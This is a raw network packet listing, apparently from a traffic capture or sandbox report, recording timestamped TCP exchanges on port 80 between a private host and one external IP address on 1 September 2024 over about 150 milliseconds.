Sep 1, 2024 18:27:46.944322109 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.944344997 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.944380999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944391966 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944402933 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944422960 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.944432974 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.944576025 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944683075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944699049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944730997 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.944828987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944839954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944849968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944860935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944866896 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.944888115 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.945108891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.945117950 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.945148945 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.946414948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.946465969 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.946481943 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.946491003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.946532011 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.946644068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.946655035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.946665049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.946675062 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.946688890 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.946717978 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.946938992 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.947593927 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.947649956 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.947650909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.947663069 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.947693110 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.947860956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.947871923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.947881937 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.947896957 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.947905064 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.947942019 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.948205948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.948214054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.948227882 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.948239088 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.948249102 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.948249102 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.948277950 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.948581934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.948591948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.948618889 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.948693037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.948750973 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.949629068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.949691057 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.949701071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.949738979 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.949814081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.949851990 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.949856043 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.949970961 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.949987888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.949997902 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.950006962 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.950032949 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.958739996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.958825111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.958837032 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.958873987 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.958950996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.958997965 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.959058046 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959069967 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959080935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959094048 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959095955 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.959127903 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.959381104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959471941 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959482908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959492922 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959506035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959510088 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.959530115 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.959798098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959840059 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.959922075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959932089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959942102 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959954023 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959964037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.959964991 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.959994078 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.960334063 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.960345984 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.960355997 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.960366964 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.960378885 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.960403919 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.972551107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.972600937 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.972629070 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.972640038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.972676039 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.972839117 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.972850084 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.972860098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.972872019 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.972886086 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.972913027 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.973201990 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973212004 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973222971 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973232031 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973242998 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.973259926 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.973500013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973514080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973524094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973532915 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973562956 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.973850965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973861933 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973870993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973896027 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973907948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973920107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.973929882 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.974042892 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.987001896 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.987060070 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.987076998 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.987107992 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.987142086 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.987286091 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.987296104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.987306118 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.987318039 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.987339020 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.987354994 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.007543087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.007630110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.007641077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.007674932 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.007776976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.007786989 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.007797003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.007808924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.007810116 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.007832050 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.008161068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.008171082 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.008181095 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.008192062 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.008203983 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.008224010 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.008512974 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.008523941 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.008534908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.008544922 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.008549929 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.008574009 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.015352964 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.015407085 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.015450954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.015460968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.015501976 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.015680075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.015691996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.015702963 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.015731096 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.015738964 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.015767097 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.032630920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.032804012 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.032814980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.032824993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.032836914 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.032847881 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.032854080 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.032879114 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.032895088 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.033025980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033035994 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033067942 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.033214092 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033226013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033271074 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.033346891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033417940 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033430099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033440113 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033452034 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033452988 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.033477068 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.033735991 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.033775091 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.035927057 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036031961 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036048889 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036082983 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.036163092 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036206007 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.036237955 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036248922 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036281109 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.036458015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036468983 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036477089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036493063 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036501884 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.036531925 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.036716938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036727905 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036736965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036747932 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.036761999 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.036773920 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.037053108 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.037065029 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.037106037 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.038180113 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038249016 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038258076 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038292885 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.038356066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038367033 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038392067 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.038513899 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038527966 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038537979 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038556099 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.038583994 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.038711071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038722038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038732052 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038757086 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.038897038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038908958 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.038949013 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.039036036 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.039047956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.039078951 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.047334909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.047386885 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.047527075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.047544956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.047554970 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.047575951 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.047648907 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.047658920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.047668934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.047677994 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.047693968 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.047720909 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.047976017 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048013926 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.048044920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048055887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048084974 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.048187971 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048197985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048233986 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.048377037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048389912 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048398972 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048419952 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.048603058 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048614025 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048630953 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048649073 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.048665047 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.048866987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048877954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.048923016 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.048999071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.049021959 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.049057961 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.061094999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061166048 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061177969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061237097 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.061296940 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061338902 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.061368942 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061520100 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061531067 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061541080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061551094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061559916 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.061587095 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.061789036 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.061826944 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.061846018 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062009096 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062020063 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062030077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062041044 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062052011 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062060118 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.062068939 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062081099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062083960 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.062103987 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.062117100 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.062570095 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062630892 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062670946 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.062808037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062818050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062828064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.062870979 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.077805996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.077847958 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.077974081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.077985048 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.078018904 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.078022003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.078032970 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.078043938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.078054905 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.078079939 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.078103065 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.096353054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096369028 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096379995 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096390009 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096401930 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096406937 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.096422911 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.096534014 CEST	80	56160	94.228.169.44	192.168.2.4
